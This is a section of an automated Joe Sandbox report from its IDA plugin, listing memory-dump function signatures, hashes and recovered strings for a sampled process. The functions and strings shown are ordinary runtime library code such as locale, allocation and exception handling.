                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$cef_string_map_allocmallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 871575421-0
                                                                                                                                                                            • Opcode ID: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                                                                                            • Instruction ID: c1960cd7b6fb5947cb6ae262c6afc6c2c52a031095666da1b4f94e34f6e8d5e6
                                                                                                                                                                            • Opcode Fuzzy Hash: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9AD18B63B09A4685EF24EB79D4843ACA3B2FB44B98F848936DE4D53796DF38D445C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide$__strncntfreemalloc$CompareInfoString__crt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1548350897-0
                                                                                                                                                                            • Opcode ID: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                                                                                            • Instruction ID: 35aa30ddf307c412837b8e62214b95d0a6947302dc00e1b0a30b5607e0188f21
                                                                                                                                                                            • Opcode Fuzzy Hash: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                                                                                            • Instruction Fuzzy Hash: 2791A1FAA0978285FB318F30D45027B6791AF05BA4F886231D95D267D5DF3CE465CA00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856544966-0
                                                                                                                                                                            • Opcode ID: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                                                                                            • Instruction ID: ba35755fe06d528bfeae0f80c4953cba0ee46bbd3f4ede458cc4f0d071e5b327
                                                                                                                                                                            • Opcode Fuzzy Hash: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                                                                                            • Instruction Fuzzy Hash: FC91B933B48A4789EF24EB75E4443BDA3B2AB85B94FC54831CA4D17794DF3CA4468320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                            • API String ID: 4223619315-393685449
                                                                                                                                                                            • Opcode ID: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                                                                                            • Instruction ID: 3f7e9310c71b61b75714efbaeb8d1d6b782fb43ffccf0ff63ef92f2a5eeb4cec
                                                                                                                                                                            • Opcode Fuzzy Hash: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                                                                                            • Instruction Fuzzy Hash: 27D191BAA0874286EB109F75D4403AE77A0FF45B98F216235EE4D67B65DF38E091CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Replicator::operator[]
                                                                                                                                                                            • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                            • API String ID: 3676697650-3207858774
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C2F5
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C312
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B4C32E
                                                                                                                                                                            • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C337
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C354
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B4C370
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B4C385
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B4C31D
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B4C35F
                                                                                                                                                                            • :AM:am:PM:pm, xrefs: 00007FFBC1B4C37E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                                                                                            • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 2460671452-35662545
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$cef_string_map_allocmallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 940974311-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1019560052-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharCompareMultiStringWide__crt$freemalloc$__strncnt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 525835285-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B368F7
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B3698F
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B369A1
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B369D6
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B369E4
                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FFBC1B362F5), ref: 00007FFBC1B36A4C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memchrtolower$_errnoisspace
                                                                                                                                                                            • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                            • API String ID: 3508154992-2432849056
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36ADC
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36B76
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36B88
                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36BBB
                                                                                                                                                                            • memchr.VCRUNTIME140(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36BC9
                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FFBC1B36675), ref: 00007FFBC1B36C27
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memchrtolower$_errnoisspace
                                                                                                                                                                            • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                            • API String ID: 3508154992-2432849056
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                            • API String ID: 2943138195-1464470183
                                                                                                                                                                            APIs
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B55A60
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B55AE7
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55B26
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55B40
                                                                                                                                                                            • _Getvals.LIBCPMT ref: 00007FFBC1B55C3A
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B55C41
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: ,$false$true
                                                                                                                                                                            • API String ID: 2135902765-760133229
                                                                                                                                                                            APIs
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B455E3
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4563B
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4567A
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B456B4
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B45712
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B45718
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B4571D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_taskcalloc$ExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                            • API String ID: 2349454547-2658103896
                                                                                                                                                                            • Opcode ID: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
                                                                                                                                                                            • Instruction ID: 1761da96566171369bfcec1a9a79af159c800f20dad300c1e05e7f8caf8ecf74
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
                                                                                                                                                                            • Instruction Fuzzy Hash: ED4119AAA05B4186EB058F31E65433E67A1BB18FA8F145631CE6D23395CF3CD445C740
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                                                                                            • Instruction ID: 427a413f8ae6bdced5b35925e59778be139e6d3f9966781e78f294ab135c7cf1
                                                                                                                                                                            • Opcode Fuzzy Hash: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6571D063B08A4685EF24EBB5D4443ECA3B2EB48BE4F958935CE1D17798DE38D449C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                                                                                            • Instruction ID: fd27c29a450ecefe52ffa21dda26eb90e2769609847893ce258fc6b5b95b555b
                                                                                                                                                                            • Opcode Fuzzy Hash: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8571BB63B48A4689FF24EBB5D4443ACA3B2AB54B98F948935CE1E13B98DE3CD4458310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
